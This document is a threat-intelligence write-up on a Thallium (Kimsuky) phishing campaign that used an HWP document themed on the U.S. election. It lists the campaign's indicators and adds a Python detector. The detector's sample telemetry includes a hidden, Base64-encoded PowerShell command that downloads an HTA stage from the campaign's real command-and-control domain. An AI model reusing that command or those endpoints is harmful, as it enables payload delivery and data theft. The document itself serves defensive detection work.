North Korea-linked hacking group Thallium carries out APT attack disguised as press documents predicting the U.S. presidential election
2020-11-04 • ESTSecurity
ESRC attributed a malicious HWP document, themed as press coverage predicting the outcome of the U.S. presidential election, to the North Korea-linked Thallium (Kimsuky) group. The document hides an OLE object containing a script named Hancom.Configuration.VBS, and the payload only runs if the recipient accepts the HWP security prompt for the embedded object, so the lure depends on user interaction rather than on an exploit. The infection chain used xeoskin.co[.]kr as its command-and-control server: it passed parameters to cross.php, fetched an HTA stage (suf.hta), uploaded collected data to report.php, and launched a PowerShell keylogger whose path was supplied Base64-encoded. On the host the chain collected system and running-process information, Base64-encoded the XML data it wrote locally, and established persistence with a scheduled task named AhnlabUpdate that runs every hour, a name that mimics AhnLab, the Korean antivirus vendor, so defenders should not dismiss it as a legitimate updater. The attribution rests on markers reused from earlier Thallium activity: the same multipart boundary string in the upload requests and the mutex Global\AlreadyRunning191122. The theme exploits interest in how U.S.–North Korea policy would shift after the election.
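The indicators above (the dropper script name, the C2 domain and its stage paths, the hourly AhnlabUpdate task, the mutex) are what a defender would hunt for in endpoint and proxy telemetry. The following is an added example, not code from ESRC or from the write-up, that runs those checks over constructed sample records. The record format, the wscript.exe parent for the VBS, and the decoded PowerShell text are assumptions made to exercise the matcher; the real keylogger script is not reproduced here.

```python
import base64
import re

# Indicators quoted in the ESRC write-up (domain is de-fanged there as xeoskin.co[.]kr).
C2_DOMAIN = "xeoskin.co.kr"
C2_PATHS = ("/cross.php", "/suf.hta", "/report.php")
DROPPER_SCRIPT = "hancom.configuration.vbs"
MUTEX_NAME = r"Global\AlreadyRunning191122"
TASK_NAME = "AhnlabUpdate"
HOURLY = "PT1H"  # ISO-8601 duration used by Task Scheduler XML for a one-hour repetition

# Matches the -e/-ec/-enc/-EncodedCommand switch that carries a Base64 (UTF-16LE) script.
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_powershell(cmdline: str):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None if absent/invalid."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def match_event(event: dict) -> list:
    """Return the names of every indicator that fires on one telemetry record."""
    hits = []
    kind = event.get("kind")
    if kind == "process":
        cmd = event.get("cmdline", "")
        text = cmd.lower()
        decoded = decode_encoded_powershell(cmd)
        if decoded:
            text += " " + decoded.lower()  # inspect the decoded script, not just the blob
        if DROPPER_SCRIPT in text:
            hits.append("dropper_script_name")
        if C2_DOMAIN in text:
            hits.append("c2_domain_in_cmdline")
        if any(p in text for p in C2_PATHS):
            hits.append("c2_stage_path_in_cmdline")
    elif kind == "network":
        url = event.get("url", "").lower()
        if C2_DOMAIN in url:
            hits.append("c2_domain")
            if any(p in url for p in C2_PATHS):
                hits.append("c2_stage_path")
    elif kind == "task":
        if event.get("name", "").lower() == TASK_NAME.lower():
            hits.append("task_name_ahnlabupdate")
            if event.get("interval") == HOURLY:
                hits.append("task_hourly_trigger")
    elif kind == "mutex":
        if event.get("name") == MUTEX_NAME:
            hits.append("thallium_mutex")
    return hits


def scan(events) -> list:
    """Return [(index, hits)] for every record with at least one indicator hit."""
    return [(i, h) for i, e in enumerate(events) if (h := match_event(e))]


def _encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (assumed format; not captured from the campaign). The decoded
# PowerShell is invented to exercise the decoder and is not the real keylogger.
SAMPLE_EVENTS = [
    {"kind": "process", "cmdline": r'"C:\Windows\System32\wscript.exe" C:\Users\u\AppData\Local\Temp\Hancom.Configuration.VBS'},
    {"kind": "process", "cmdline": "powershell.exe -nop -w hidden -enc "
                                   + _encode_powershell("Invoke-WebRequest http://xeoskin.co.kr/suf.hta")},
    {"kind": "network", "url": "http://xeoskin.co.kr/report.php", "method": "POST"},
    {"kind": "task", "name": "AhnlabUpdate", "interval": "PT1H"},
    {"kind": "mutex", "name": r"Global\AlreadyRunning191122"},
    {"kind": "process", "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer'},
    {"kind": "task", "name": "GoogleUpdateTaskMachineUA", "interval": "PT1H"},
    {"kind": "network", "url": "https://www.example.com/report.php", "method": "GET"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["kind"], hits)
```

Two design points: the encoded-command switch is decoded before matching, because the C2 domain and stage paths never appear in the Base64 blob itself; and the stage-path check on network records is nested under the domain match so that a benign site serving its own report.php does not fire the indicator, which matters because these file names are generic while the domain, task name and mutex are the campaign-specific markers.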